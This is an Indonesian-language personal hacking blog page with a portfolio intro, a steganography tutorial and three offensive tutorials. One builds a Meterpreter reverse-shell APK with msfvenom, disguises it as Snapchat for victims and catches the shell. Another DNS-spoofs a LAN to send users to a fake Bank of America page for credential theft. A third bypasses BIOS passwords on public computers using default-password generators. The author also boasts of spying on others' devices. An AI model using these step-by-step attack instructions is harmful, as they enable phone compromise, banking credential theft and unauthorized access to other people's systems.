Hello World!

“Flying down a tunnel of 1s and 0s is not how hacking is really done"

“Behind every successful Coder there an even more successful De-coder to understand that code."

“A hacker does for love what others would not do for money"

“A hacker to me is someone creative who does wonderful things"

"Hacking is not a crime, it's a profession till the time you play with it safely "

I'm Diddo Adding Adove,
Owner & Pentester
from zvilsec

I have rich experience in security system & internet security. Also I am journalist for technology and other stuff section. Also i love learning a new language. Feel free to contact me writing an email with your project idea.

What I Do
Pentester

I like to test my system even somebody`s system for fun and to learn.

Script Kiddies

I enjoyed for changing someone code to develop it in to a new one.

Web Design

Literally i build website not from 0 but i like to use some code to make in to a new one.

Spying

I love to spy someone`s device,it makes me know about their secret even it was a inappropriate action.

Writing

Writing is my other hobby in my life.

Marketing

Someday i will become a great marketer

Recent Works

Cara Menyembunyikan File Pada Gambar Atau Audio


Steganografi adalah proses menyembunyikan file, gambar, video, teks di dalam file lain. Seperti yang disebutkan dalam Wikipedia, Steganografi merupakan kombinasi dari dua kata Yunani, steganos diartikan tertutup, disembunyikan, atau dilindungi, dan graphein yang memiliki arti menulis. Sumber mengatakan bahwa metode ini pertama kali dipakai oleh Histiaeus, seorang raja Yunani kuno, pada tahun 440BC. Dia mencukur kepala pelayannya yang paling tepercaya, dan menandai pesan rahasia itu di kepalanya. Setelah rambut itu tumbuh kembali, ia mengirim pelayan itu ke salah satu pengikut untuk menyampaikan pesan yang memiliki beberapa informasi mengenai serangan yang akan datang ke Yunani. Sekarang, di zaman modern, Steganografi telah berkembang, jauh lebih baik dan banyak digunakan untuk mengirim dan menerima pesan rahasia digital dengan menyembunyikannya ke dalam file lain. Untuk detail lebih lanjut tentang Steganografi, lihat tautan ini. Sekarang mari kita lihat cara menyembunyikan file di dalam gambar di Linux.

Disclaimer:

Steganografi adalah topik yang sangat luas. Tutorial ini hanya mencakup cara menyembunyikan file di dalam gambar, yang merupakan konsep inti dari Steganografi. Tolong jangan berasumsi bahwa ini tidak dapat dipatahkan oleh pakar keamanan mana pun. Metode yang dijelaskan di sini sangat mendasar, sehingga bahkan profesional keamanan menengah dapat dengan mudah memecahkannya dalam beberapa jam. Langkah-langkah yang dijelaskan di bawah ini murni untuk tujuan pendidikan. Kami tidak bertanggung jawab atas penyalahgunaan apa pun.

Sembunyikan file di dalam gambar di Linux

Kita dapat menyembunyikan file di dalam gambar dengan metode yang berbeda. Di sini saya telah memberikan 5 metode.

Metode 1

Metode ini tidak memerlukan perangkat lunak tambahan apa pun. Hanya pengetahuan dasar perintah Linux sudah cukup. Namun metode ini perlu dilakukan pada linux 64 bit.

Saya punya satu file gambar bernama image.jpg dan direktori yang disebut sk. Di dalam direktori ini, ada file bernama secret.txt yang memiliki beberapa pesan rahasia. Ini adalah file yang akan kita tanam di file image.jpg. Anda dapat menempatkan sejumlah file yang ingin Anda sembunyikan di dalam direktori ini. Kemudian, saya akan memampatkan sk direktori dan menyimpannya sebagai secret.zip untuk menjadikannya sebagai file tunggal. Akhirnya, saya akan menggabungkan file zip (secret.zip) dan file gambar (image.jpg) menggunakan perintah cat dan menyimpannya sebagai ostechnix.jpg.

Untuk lebih jelasnya,

    image.jpg - File gambar acak.
    sk - Direktori yang berisi semua file rahasia.
    secret.zip - Arsip direktori sk.
    ostechnix.jpg - File gambar keluaran yang berisi secret.zip dan image.jpg.

Langkah 1: Masukkan file gambar dan direktori dalam folder. Saya telah menempatkan keduanya di folder Dokumen.

Langkah 2: Pindahkan semua file yang ingin Anda sembunyikan di dalam folder "sk". Kemudian, kompres folder ini dan simpan sebagai "secret.zip". Untuk mengompres folder, klik kanan padanya, dan pilih kompres.

Langkah 3: Selanjutnya buka Terminal. Pergi ke lokasi di mana kamu menyimpan file zip dan gambar (Dalam kasus ini adalah Dokumen). Akhirnya, gabungkan file secret.zip dan test.jpg, dan simpan sebagai ostechnix.jpg menggunakan perintah cat.

$ cd Dokumen

$ cat image.jpg secret.zip> ostechni
x.jpg


Itu dia. Kami sekarang telah menyembunyikan file rahasia di dalam ostechnix.jpg. Ini adalah file penting. Hapus saja semua file lain kecuali ostechnix.jpg.

Ostechnix.jpg akan terlihat seperti file gambar biasa dan siapa pun dapat melihatnya menggunakan aplikasi penampil gambar apa pun. Tapi, mereka mungkin tidak tahu file ini memiliki beberapa file rahasia di dalamnya.

Untuk melihat file yang tersembunyi di dalam file gambar ostechnix.jpg, buka saja kompres menggunakan perintah berikut:

$ unzip ostechnix.jpg

Atau,

$ unzip -t ostechnix.jpg


Output sampel:

Archive: ostechnix.jpg
[ostechnix.jpg] warning: 712139 additional bytes at the beginning or inside the zipfile
(Anyway trying to process)
make: sk /
inflate: sk / secret.txt


Seperti yang kamu lihat di output di atas, sk direktori yang memiliki file rahasia di dalamnya telah diekstraksi. Sekarang, kembali ke folder dan periksa isinya. kamu akan melihat semua file di sana.

Salah satu kelemahan dari metode ini adalah kita tidak dapat menambahkan frasa sandi apa pun ke file gambar. Jangan khawatir! Dalam metode berikut, kita dapat menambahkan frasa sandi ke file output.

Metode 2 - menggunakan Steghide

Steghide adalah utilitas baris perintah yang membantu kita menyembunyikan data rahasia di dalam file gambar atau audio. Ini mendukung file JPEG, BMP, WAV dan AU.

Steghide tersedia di repositori default dari banyak distribusi Linux.

Di Arch Linux dan variannya, kamu dapat menginstalnya menggunakan perintah:

$ sudo pacman -S steghide

Di Debian, Ubuntu:

$ sudo apt install steghide


Sekarang kamu dapat menyembunyikan file rahasia di dalam gambar atau audio seperti di bawah ini. Saya berasumsi kamu telah meletakkan file rahasia yang ingin kamu enkripsi dan file gambar atau audio di folder yang sama. Jika kamu meletakkannya di folder yang berbeda, kamu harus memberikan path lengkap dalam perintah berikut.

$ steghide embed -ef secret.txt -cf ostechnix.jpg

Kamu akan diminta memasukkan kata sandi.

Masukkan frasa sandi:
Masukkan kembali frasa sandi:
menanamkan "secret.txt" di "ostechnix.jpg" ... selesai

Dalam contoh di atas, saya telah menyematkan file teks bernama secret.txt ke file gambar bernama ostechnix.jpg. Kamu sekarang dapat menghapus file secret.txt asli. Karena, kita hanya menyematkan di dalam file gambar. Jika kamu ingin menyematkan banyak file, letakkan di satu folder dan zip, lalu sembunyikan seperti dijelaskan di atas.

Untuk mengekstrak file rahasia dari gambar, jalankan:

$ steghide extract -sf ostechnix.jpg
Masukkan frasa sandi untuk mengekstraknya:

Masukkan frasa sandi:
menulis data yang diekstraksi ke "secret.txt".

Untuk detail lebih lanjut, lihat halaman manual,

$ man steghide

Metode 3 - menggunakan Outguess

Outguess adalah alat stegnografis baris perintah lain untuk menyembunyikan file rahasia di dalam gambar. Saat ini, mendukung format gambar PPM, PNM, dan JPEG.

Untuk menginstalnya di Debian, Ubuntu dan sistem berbasis DEB lainnya, jalankan:

$ sudo apt install outguess

Setelah terinstal, pergi ke lokasi di mana kamu menyimpan file rahasia dan gambar dan menanamkan file rahasia ke dalam gambar menggunakan perintah berikut:

$ outguess -d secret.txt ostechnix.jpg output.jpg

Di sini, file output.jpg adalah yang memiliki file data rahasia kita. Amankan dan hapus yang lainnya.

Kamu juga dapat menambahkan frasa sandi ke file keluaran seperti di bawah ini.

$ outguess -k "kunci rahasia saya" -d secret.txt ostechnix.jpg output.jpg


Ganti "kunci rahasia saya" dengan frasa sandi kamu sendiri.

Untuk mengekstrak file, cukup lakukan:

$ outguess -r output.jpg secret.txt

Jika kamu telah menggunakan kata sandi, maka gunakan perintah ini sebagai gantinya:

$ outguess -k "kunci rahasia saya" -r output.jpg secret.txt

Untuk detail lebih lanjut, lihat halaman manual.

$ man outguess


Metode 4 - menggunakan Stegosuite

Stegosuite adalah alat steganografi grafis untuk menyembunyikan file di dalam gambar. Ini adalah alat steganografi gratis dan open source yang ditulis dalam Java. Ini menggunakan metode enkripsi AES untuk menanamkan data. Ini mendukung format gambar BMP, GIF dan JPG.

Untuk menginstalnya di Debian, Ubuntu dan sistem berbasis DEB lainnya, jalankan:

$ sudo apt install stegosuite

Setelah terinstal, luncurkan Stegosuite dari Dash atau Menu.
antarmuka stegosuite


Klik File -> Buka dari bilah menu dan pilih gambar yang ingin Anda gunakan untuk menyembunyikan file. Kemudian masukkan pesan di kolom pertama. Klik kanan pada kolom kedua dan pilih "Tambah file ..". Terakhir, masukkan frasa sandi di kolom ketiga.

Terakhir, klik tombol embed di bagian bawah antarmuka Stegosuite.

Sekarang file gambar baru akan dibuat dengan nama "filename_embed" di folder yang sama di mana Anda telah memilih gambar. Misalnya, jika Anda telah memilih gambar yang disebut "image.jpg" dari folder Documents, file gambar baru akan dibuat dengan nama "image_embed.jpg" di folder Documents itu sendiri.

Untuk mengekstrak file rahasia dari gambar, cukup buka lagi di antarmuka Stegosuite, masukkan frasa sandi dan klik tombol Ekstrak.


Semua file akan diekstraksi dalam folder yang sama.

Untuk detail lebih lanjut, lihat situs web Stegosuite.

Metode 5 - menggunakan Steg

Steg adalah alat steganografi sederhana, lintas platform, dan grafis, ditulis menggunakan bahasa pemrograman C ++. Ini adalah perangkat lunak portabel, jadi unduh saja, bawa ke mana saja dan mulailah menggunakannya dalam waktu singkat, apa pun sistem operasi yang kamu gunakan. Steg mendukung format gambar JPEG, JPG, TIFF, PNG, dan BMP. Menggunakan teknik Steganografi dan Kriptografi untuk menyembunyikan data di dalam gambar terkompresi atau tidak terkompresi.

Pemakaian

Klik tautan ini untuk mengunduh aplikasi Steg. Ini tersedia untuk arsitektur 32 dan 64 bit.

Atau, cukup gunakan perintah berikut untuk mengunduhnya tergantung pada arsitektur yang kamu gunakan.

Untuk 64 bit:

$ wget https://googledrive.com/host/0B-_yxJMDtRxyUExLZzZ3S2VDbjQ/steg-v1.0.0.2-linux64.tgz

Untuk 32 bit:

$ wget https://googledrive.com/host/0B-_yxJMDtRxyRDNGNk1YcXR0UTg/steg-v1.0.0.2-linux32.tgz


Setelah mengunduh, ekstrak menggunakan perintah:

$ tar -xvzf steg-v1.0.0.2-linux64.tgz

Pergi ke direktori Steg:

$ cd steg-v1.0.0.2-linux64 /

Dan, ketikkan perintah berikut untuk menjalankannya.

$ ./steg.sh


Klik Ya untuk menerima perjanjian lisensi.

Klik OK untuk melanjutkan.

Beginilah tampilan antarmuka aplikasi Steg.

Sekarang, mari kita sembunyikan beberapa data di dalam gambar.

Untuk melakukannya, buka File -> Buka gambar umum atau Buka gambar JPEG. Pastikan kamu telah memilih gambar berukuran besar untuk menyimpan lebih banyak data di dalamnya. Semakin besar gambar yang kamu pilih, semakin banyak file yang dapat kamu simpan di dalam gambar.

Setelah kamu membuka gambar, gambar asli dan gambar yang dimodifikasi (gambar keluaran) akan ditampilkan masing-masing di panel kiri dan kanan. Juga, Ini menampilkan ukuran yang tersedia untuk menyimpan data di dalam gambar di sudut kanan bawah.

Sekarang, pergi ke hide -> hide Data dari bilah menu atas. Pilih file yang ingin kamu sembunyikan. Pastikan file yang kamu pilih lebih kecil dari ruang yang tersedia di gambar yang dimodifikasi. Setelah menambahkan data, kamu akan melihat kotak dialog konfirmasi yang mengatakan: Data berhasil disembunyikan.

Inilah bagian yang penting. Kamu dapat memilih berbagai mode enkripsi.

    Auto: Data akan dienkripsi, tetapi kamu tidak perlu PassPhrase atau kunci untuk mengekstrak data.
    Symmetric: Kamu harus memberikan PassPhrase untuk mengenkripsi data, dan penerima akan memerlukan PassPhrase yang sama untuk mengekstraknya.
    Asymmetric unsigned: ketika kamu ingin menyembunyikan data (kamu adalah pengirim), hanya kunci publik penerima yang diperlukan. Saat kamu ingin mengekstrak data (kamu adalah penerima), hanya kunci pribadi kamu yang diperlukan.
    Asymmetric signed: ketika kamu ingin menyembunyikan data (kamu adalah pengirim) kunci publik penerima dan kunci pribadi kamu diperlukan. Saat kamu ingin mengekstrak data (kamu adalah penerima), hanya kunci pribadi kamu yang diperlukan tetapi kunci publik pengirim diminta. Jika kamu tidak memberikan kunci publik pengirim, pada akhir proses ekstraksi, kamu akan diperingatkan bahwa identitas pengirim tidak diverifikasi. Jika kamu memberikan kunci publik pengirim, kamu akan diberi tahu jika verifikasi tanda berhasil.

kamu dapat memilih metode kriptografi pilihan Anda.

Untuk memilih metode kriptografi tertentu, pergi ke Edit -> Configuration dari menu bar. Metode kriptografi default adalah otomatis. Anda juga dapat menyematkan beberapa pesan pada file jika kamu mau.


Setelah semuanya baik-baik saja, klik tombol Simpan di bilah alat, dan simpan di lokasi yang kamu inginkan.

Selesai! Data gambar dienkripsi di dalam gambar. Gambar ini akan terlihat seperti gambar biasa. Kamu dapat melihatnya menggunakan aplikasi gambar apa pun.

Untuk mengekstrak data tersembunyi, cukup buka gambar terenkripsi di aplikasi Steg. Untuk melakukannya, buka Ekstrak -> Ekstrak data dari bilah menu.

Pilih lokasi tempat untuk menyimpan data kamu. Selesai!

Itu dia. Kamu sekarang dapat melihat data.

Seperti yang kamu lihat, ini sangat mudah diikuti dan tidak memerlukan keahlian khusus. Cukup buka gambar, sembunyikan beberapa data rahasia, dan bagikan.

Untuk detail lebih lanjut tentang Steg, lihat situs web resmi.

Cara Menyamarkan Backdoor APK Dengan APKTOOL

Kamu mungkin sudah membuat apk backdoor (paket android) sebelumnya pada kali, itu dilakukan dengan cara yang sama seperti kamu membuat exe backdoor. Yang dibuat dengan perintah msfvenom.

Dalam tutorial singkat ini aku akan menunjukkan cara mengubah ikon, izin, dan nama aplikasi, agar lebih meyakinkan bagi targetmu.  

Langkah 1 Membuat Apk Backdoor

Jadi, mari kita mulai dengan membuat apk pada meterpreter.  Masukkan kode ini di terminal

msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk

Ini akan membuat app.apk di folder kamu saat ini.

Sekarang sampai pada bagian yang sulit.

Langkah 2 Menginstal Apktool

Kamu harus menginstal Apktool pada sistem, saya menggunakan windows untuk ini, tetapi harus dilakukan dengan cara yang sama di linux / mac os.  Karena ini berbeda untuk semua orang, saya tidak akan menginstal alat ini.  Lihatlah di situs web mereka untuk sistem kamu.

Perhatikan bahwa Apktool diinstal secara default di reverse engineering toolkit dari Kali linux!

Langkah 3 Dkompilasi Apk 

Pertama periksa apakah kamu dapat menjalankan apktool dengan benar dengan menjalankan perintah:

apktool

Jika kamu melihat menu bantuan artinya instalasi sudah benar.  Sekarang jalankan perintah

apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder

apktool sekarang akan mendekompilasi app.apk ke /pathtoyourfolder/folder.  Di folder baru ini kamu akan menemukan beberapa file. Antara lain:

Folder 'res'

File AndroidManifest.xml

Folder 'smali'

Folder 'asli'

File apktool.yml

Langkah 4 Memodifikasi File

Untuk tutorial ini kita hanya akan memodifikasi file AndroidManifest.xml dan folder 'res'.  Pertama, buka AndroidManifest.xml dengan editor teks.  Saya menggunakan Notepad ++.

Kamu akan melihat sesuatu seperti ini:

Gambar melalui imgur.com

Pertama, mari kita hapus beberapa baris yang mungkin tidak kita perlukan dan akan memberi pengguna peringatan tambahan.


Sekarang kita masuk ke folder 'res'.  Di sini kamu akan menemukan folder 'values', masuk ke dalamnya.  Sekarang kamu akan menemukan 2 file, 1 bernama strings.xml, sekali lagi, buka file xml ini dengan editor teks.

kamu akan menemukan baris <string name="appname">MainActivity</string>

Ubah '' 'MainActivity' 'menjadi nama aplikasi yang kamu sukai, saya memilih nama '' Snapchat ''.  Tetapi pilihlah nama yang menurut kamu cocok.

Simpan file dan kembali ke folder / res /.
Buat 3 folder bernama:

drawable-ldpi-v4

drawable-mdpi-v4

drawable-hdpi-v4

Sekarang kamu perlu menemukan ikon yang sesuai untuk aplikasimu.

Saya menggunakan Android Asset Studio situs web dan resizeimage.net

Tujuannya adalah untuk mendapatkan file 3 png dengan ukuran berikut:

 36x36 (piksel) untuk folder ldpi

 48x48 untuk folder mdpi

 72x72 untuk folder hdpi

Beri nama file png ini semua 'icon.png' dan letakkan di folder yang sesuai.

Langkah 5 Menyusun Aplikasi 

Proses ini sangat mudah.  Kembali ke terminal apktool dan masukkan perintah berikut:

apktool b /pathtoyourfolder/folder

Ini akan membuat apk di folder 'dist' yang baru dibuat (ditemukan di apktool b / pathtoyourfolder / folder)

Langkah 6 Signing Apk

Saya menggunakan zip untuk signing apk atau jika itu tidak coba unduh file ini.  Unzip file dan cd ke folder baru, sekarang gunakan perintah:

java -jar signapk.jar Certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk

Ini akan membuat file bernama signed.apk di folder baru yang dapat kamu kirim ke korban dan mereka akan melihat nama dan ikon aplikasi yang dikenal.

Langkah 7 Exploit

 Sekarang bagian terakhir,
 buka metasploit menggunakan:

 msfconsole
Open multi/handler
use multi/handler
set the payload
set payload
android/meterpreter/reversetcp

set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)

and exploit
exploit

Sekarang setelah membuka aplikasi, kamu akan mendapatkan shell meterpreter yang masuk.

Cara DNS Spoof di Jaringan Lan dan Mengarahkan Semua Situs Ke Situs Palsu

Ada begitu banyak cara untuk meretas sistem atau jaringan, yang berarti kamu harus berpikir kreatif untuk bisa berhasil.

Banyak peretas pemula terlalu memfokuskan energi pada password (yang seharusnya menjadi pilihan terakhir kecuali kamu memiliki alat khusus atau 10.000 botnet mesin) atau mengeksploitasi kerentanan dalam sistem operasi (semakin jarang).  Dengan semua protokol yang digunakan sistem komputer (DNS, SMTP, SMB, SNMP, LDAP, DHCP, dll), pasti ada kerentanan dalam protokol yang dapat kita manfaatkan untuk mendapatkan apa yang kita kejar.

DNS Spoofing: Mengarahkan Pengguna ke Situs Web tertentu

Dalam peretasan ini, kita akan mengeksploitasi Layanan Nama Domain (DNS).  Seperti yang Anda ketahui, DNS digunakan untuk resolusi nama domain atau mengonversi nama domain seperti google.com ke alamat IP 56.23.13.99.  Jika kita dapat mengacaukan protokol ini, kita bisa mengirim seseorang yang mencari nama domain seperti bankofamerica.com ke situs web jahat kita dan mengambil kredensial mereka.

Dug Song dari University of Michigan mengembangkan seperangkat alat peretasan untuk tujuan ini.  Kami telah menggunakan salah satu alatnya, arpspoof, untuk melakukan serangan man-in-the-middle.  Dalam serangan ini, kita akan menggunakan alat dnsspoof-nya, yang akan memungkinkan kita untuk memalsukan layanan DNS di jaringan area lokal.

Ingat, meskipun peretasan ini mengharuskan kamu berada di LAN yang sama, kamu bisa mendapatkan akses ke LAN melalui kerentanan jarak jauh atau kata sandi yang lemah hanya pada SATU mesin di jaringan.  Di institusi dengan ribuan komputer di jaringan mereka, itu berarti kamu harus menemukan satu mesin yang dapat dieksploitasi untuk dapat menerapkan serangan ini untuk seluruh jaringan.

Langkah 1 Siapkan OS Hacking Kalian, Kita akan Menggunakan Kali Linux

Mari kita mulai dengan menyalakan Kali dan pergi ke Aplikasi -> Kali Linux -> Sniffing -> Network Sniffers, dan akhirnya, dnsspoof, seperti yang terlihat pada tangkapan layar di bawah ini.

Langkah 2 Buka Dnsspoof

Ketika kamu mengklik dnsspoof, terminal berikut terbuka.  Perhatikan betapa sederhananya sintaksnya.

dnsspoof -i <interface> -f <hostsfile>

Langkah 3 Set Up untuk Sniffing

Kita akan mencoba untuk mendapatkan sistem Windows 7 di jaringan untuk mengarahkan bankofamerica.com ke situs web kita sendiri.  Mari kita gunakan Google Chrome, atau browser apa saja, untuk bernavigasi di sana.

Langkah 4 Bersihkan Cache DNS

Pertama, kita perlu membersihkan cache DNS dari sistem Windows 7.  Dengan cara ini, klien Windows tidak akan menggunakan DNS yang di-cache pada sistem dan sebagai gantinya akan menggunakan layanan DNS "diperbarui" kita.  Pada kenyataannya, langkah ini tidak diperlukan, tetapi untuk demonstrasi, langkah ini akan di skip.

Pertama, tutup browser dan ketik:

ipconfig /flushdns

Sekarang kita perlu mengatur kartu jaringan kita di server Kali kita ke mode promiscuous (dia, kartu jaringan kamu, akan menerima paket dari siapa pun).

ifconfig eth0 promisc

Sekarang kita perlu mematikan koneksi antara sistem Windows 7 dan [www.bankofamerica.com].  Ini memaksa pengguna mesin Windows 7 untuk mengautentikasi ulang.

tcpkill -9 host www.bankamerica.com

Setelah membunuh www.bankofamerica.com, hentikan tcpkill dengan ctrl c.

Langkah 5 Buat File Hosts

Dalam tutorial Linux saya tentang DNS klien, saya menunjukkan kepada kalian bagaimana file host di Linux bertindak seperti DNS statis.  Di sini kita akan menggunakan file host untuk mengarahkan kembali pencarian sistem Windows 7 untuk Bank of America ke situs web kita.  Ayo buka direktori /usr/local.

cd /usr/local

Dari sana, mari kita buka file host di editor teks apa pun.  Kali tidak memiliki kwrite yang telah kami gunakan di BackTrack, tetapi ia memiliki VIM grafis, atau gvim, jadi mari kita gunakan itu.

host gvim

Sekarang kita memiliki file host terbuka, kita perlu menambahkan baris berikut untuk itu.  Ingat, file host hanya memetakan alamat IP ke nama domain, jadi kita memasukkan alamat IP kita dan memetakannya ke [www.bankofamerica.com].

192.168.1.101 www.bankofamerica.com

Penting di sini untuk menggunakan kunci TAB antara alamat IP dan domain.  Spasi akan ditafsirkan oleh sistem untuk menjadi bagian dari nama domain.

Langkah 6 Buat Laman Web BOA Baru

Sebelum kita melangkah lebih jauh, kita sekarang perlu mematikan mode promiscuous pada kartu jaringan kita.

ifconfig eth0 -promisc

Sekarang kita perlu membuat situs web yang akan mengarahkan pengguna ketika mereka mengetik bankofamerica.com di URL browser mereka.  Mari kita buat halaman web sederhana.  

Sekarang buka index.html.

gvim /var/www/index.html

Ini seperti apa secara default.  Kita ingin mengubahnya dan memasukkan html berikut dan menyimpannya.

<html>
<body> <h1>This is the Fake Bank of America Web Site! </h1>
</body>
</html)>


Tentu saja, jika kamu benar-benar ingin melakukan peretasan ini, kamu harus meluangkan waktu untuk membangun situs web yang terlihat dan bertindak seperti situs yang akan kamu spoofing.

Langkah 7 Mulai Server Web Apache

Sekarang, mulai server web yang dibangun ke Kali.  Ini adalah Apache dan layanannya adalah HTTP, jadi kita pergi ke Kali Linux -> System Services -> HTTP, dan akhirnya, apache2 mulai.  Ini akan memulai server web kami di sistem Kali kita yang menampung situs web Bank of America palsu.

Langkah 8 Mulai Dnsspoof

Pada langkah terakhir kita, kita harus memulai dnsspoof dan mengarahkan pengguna ke entri di file "host" kita terlebih dahulu.  Dnsspoof akan menahan permintaan DNS dan mengirimkannya terlebih dahulu ke file host kita sebelum mengirimnya ke server DNS.  Dengan cara ini, jika kita memiliki entri dalam file host kita yang dicari klien, itu akan diarahkan seperti yang ditentukan oleh file host kita.

Ingat, kita memetakan bankofamerica.com ke alamat IP kita sehingga mereka akan pergi ke server web Kita dan akan melihat situs web buatan kita.

host dnsspoof -f

Langkah 9 Navigasi ke BOA dari Windows 7

Sekarang, dari sistem Windows 7, ketik URL bankofamerica.com dan itu akan menarik situs web palsu kami vs. situs Bank of America yang asli.

Sekarang, ketika siapa pun di jaringan area lokal mencoba menavigasi ke situs web Bank of America, mereka malah akan mengunjungi situs web kita!

Seperti yang dapat kamu bayangkan, dengan dnsspoof, kita dapat mengobrak abrik jaringan LAN.

Tutorial ini hanya contoh, kalian harus ber improvisasi agar dapat hasil yang kalian inginkan.

Cara Bypass Bios Password

Mudah menjalankan Kali Linux dari USB secara live di hampir semua komputer yang tersedia, tetapi banyak laptop dan desktop yang dapat diakses publik akan dikunci untuk mencegah penggunaan tersebut.  PC sekolah, kantor, atau perpustakaan dapat diamankan dengan kata sandi BIOS, yang seringkali merupakan kata sandi standar yang mudah dipulihkan.  Namun, begitu kamu memiliki akses, kamu dapat menggunakan flash drive USB untuk menjalankan Kali live di PC mana pun yang kamu temukan.

Menjalankan Kali Linux di Komputer melalui USB

Dengan kali live USB, kamu dapat menjalankan OS peretasan pada komputer apa pun yang dapat kamu tancapkan, artinya kamu tidak harus menggunakan komputer pribadi kamu, kamu juga tidak perlu membeli PC  hanya untuk menggunakan Kali. Dengan.  Live USB memungkinkan sistem komputer digunakan untuk mem-boot dari thumb drive, mengabaikan sistem OS pada hard drive yang biasanya digunakan boot oleh komputer.

Saat menjalankan Kali dari USB, ada dua cara untuk melakukannya.  Salah satunya persisten, artinya perubahan yang kamu buat disimpan ke flash drive.  Yang lainnya adalah non-persisten, di mana tidak ada perubahan yang disimpan apa pun yang kamu lakukan akan hilang saat kamu keluar dari sesi.

Jika kamu tidak perlu menyimpan file atau mengingat pengaturan yang telah kamu ubah, kamu dapat menjalankan instalasi dalam mode langsung atau secara live. Jika kamu ingin install secara keseluruhan dan permanen gunakan fitur persistence

Menggunakan Kali Live USB di PC Windows Apa Saja

Meskipun komputer dapat ditemukan hampir di mana-mana saat ini, jarang ditemukan satu untuk penggunaan umum yang tidak dilindungi dengan cara tertentu.  Sebagian besar komputer sekolah dan kantor memiliki lapisan pertahanan, biasanya memerlukan login, dan beberapa fitur yang dianggap berisiko dapat dinonaktifkan.  Contoh dari salah satu fitur ini adalah mengubah urutan boot di menu BIOS untuk memungkinkan booting dari USB.

BIOS, atau Basic Input / Output System, adalah menu konfigurasi yang dapat dijalankan pada awal booting komputer.  Sistem ini berjalan sebelum sistem operasi dan melakukan hal-hal seperti memberitahu komputer yang memasukkan perangkat input untuk mencari sistem operasi untuk boot dari mana.

Jika BIOS tidak dikunci, mengubah urutan boot agar komputer mencoba melakukan booting dari USB terlebih dahulu hanya memerlukan beberapa detik dengan menu di layar, yang biasanya dapat diakses dengan menekan F2 saat memulai komputer.

Namun, seperti yang disebutkan sebelumnya, kebanyakan komputer yang dapat diakses publik akan memiliki set kata sandi BIOS.  Kata sandi ini, kadang-kadang disebut kata sandi administrator, akan diperlukan untuk mengalihkan urutan boot, membuatnya lebih sulit bagi pengguna rata-rata untuk menjalankan Kali di komputer yang mereka miliki aksesnya.  Jika kata sandi BIOS disetel ke kata sandi yang kuat, akan sangat sulit untuk memodifikasi sistem.

Untungnya bagi peretas, banyak PC hanya menggunakan kata sandi default pada BIOS, yang dapat diturunkan dengan mudah dari nomor seri.  Ini memungkinkan seorang hacker untuk mem-bypass kata sandi BIOS untuk mengubah urutan boot agar Kali Linux dapat berjalan pada sistem.  Kita akan mengeksplorasi cara kerjanya, sehingga kita dapat menentukan apakah komputer menggunakan kata sandi BIOS default dan meretasnya.

Apa yang Harus dimulai

Untuk mencoba serangan ini, kamu harus menggunakan komputer yang memiliki versi Windows yang berjalan.  Sistem boot macOS tidak menggunakan antarmuka tipe BIOS, jadi kamu tidak akan dapat melakukan serangan semacam ini terhadap perangkat Linux atau macOS.

Setelah memiliki komputer uji, kamu harus membuat image USB yang dapat di-boot Kali Linux.  Kamu memerlukan USB stick dengan setidaknya 16 GB ruang di atasnya, meskipun lebih disarankan jika kamu menginginkan instalasi yang memungkinkan kamu untuk menyimpan file atau data.

Langkah 1 Unduh Kali Linux untuk live usb

Untuk memulai, unduh Kali Linux dari kali.org/downloads, berhati-hatilah untuk mengunduh versi yang sesuai untuk komputer yang akan kamu gunakan.  Secara umum pakai yang versi 64-bit saja.

Langkah 2 Burn Instalasi Kali Live ke USB Drive

Setelah file ini diunduh, kamu harus copy ke USB flash drive menggunakan Etcher (unduh).  Program lintas-platform gratis ini dapat mengubah img Kali menjadi USB yang dapat di-boot.  Pastikan tidak ada file pada usb karena akan terhapus dalam proses.

Masukkan drive USB ke komputer kamu, lalu buka Etcher.  Di dalam Etcher, kamu harus menyediakan dua informasi: img untuk ditulis dan drive untuk menulis img.  Untuk opsi di paling kiri, pilih img Kali yang kamu unduh, lalu tekan "Select drive" untuk memilih thumb drive kamu.  Pastikan kamu memilih drive yang benar karena setelah kamu mengklik tombol "Flash", drive yang dipilih akan dihapus.

Klik "Flash," dan proses akan dimulai, pertama membakar data ke drive, dan kemudian memverifikasi img yang akan di copy.  Ketika ini selesai, kamu dapat dengan aman mengeluarkan drive.


Langkah 3 Boot kenKomputer Target untuk Mengakses BIOS

Sekarang setelah USB siap, boot ke Kali cukup sederhana jika kamu dapat mengakses pengaturan urutan boot.  Pertama, kamu harus mengidentifikasi kunci keyboard untuk untuk nantinya ditekan ketika kamu me-reboot komputer yang mengakses menu BIOS.  Komputer saya memungkinkan akses ke menu ini dengan menekan F2.

Jika kamu tidak yakin apa perintah keyboard untuk komputer kamu, kamu dapat Google atau hanya menonton layar ketika komputer kamu mulai, karena sering kali akan mengatakan tombol mana yang harus ditekan untuk masuk ke menu startup, seperti yang terlihat di bawah ini.

Press <F2> to enter BIOS setup

Dari dalam sistem BIOS, kamu harus mencari "urutan boot" atau "menu boot."  Saat kamu menemukan ini, kamu harus mengubah urutan agar komputer mencari perangkat untuk melakukan booting.  Jika tidak ada kata sandi, ini adalah langkah di mana kamu dapat dengan mudah mengubah urutan boot sehingga drive USB datang sebelum hard drive, dan selesai!

Sayangnya, banyak komputer akan menetapkan kata sandi administrator di sini, mencegah kamu mengubah pengaturan.  Dalam hal ini, lompat ke langkah berikutnya untuk memulai proses memintasnya.

Langkah 4 Pulihkan Kata Sandi BIOS Default

Setelah mendapatkan prompt yang menyatakan bahwa kata sandi diperlukan untuk mengubah urutan boot, itu harus menyertakan nomor seri, yang dapat digunakan untuk mengetahui kata sandi.

Pada smartphone atau komputer lain, kamu harus menavigasi ke situs web yang menghasilkan kata sandi standar BIOS seperti Hapus kata sandi BIOS yang tidak dikenal.  Salin nomor seri yang kamu dapatkan dari menu BIOS, lalu masukkan ke dalam alat situs web dan tekan "Dapatkan kata sandi" (atau tombol serupa) untuk menghasilkan kata sandi standar.

Beberapa produsen yang didukung oleh situs web adalah sebagai berikut:

Asus: Current BIOS date. For example: 01-02-2013 Compaq: 5 decimal digits (e.g., 12345)
Dell: Supports such series: 595B, D35B, 2A7B, A95B, 1D3B, 6FF1, and 1F66. (e.g., 1234567-2A7B or 1234567890A-D35B for HDD)
Fujitsu-Siemens: 5 decimal digits, 8 hexadecimal digits, 5x4 hexadecimal digits, 5x4 decimal digits
Hewlett-Packard: 5 decimal digits, 10 characters
Insyde H20 (Acer, HP): 8 decimal digits
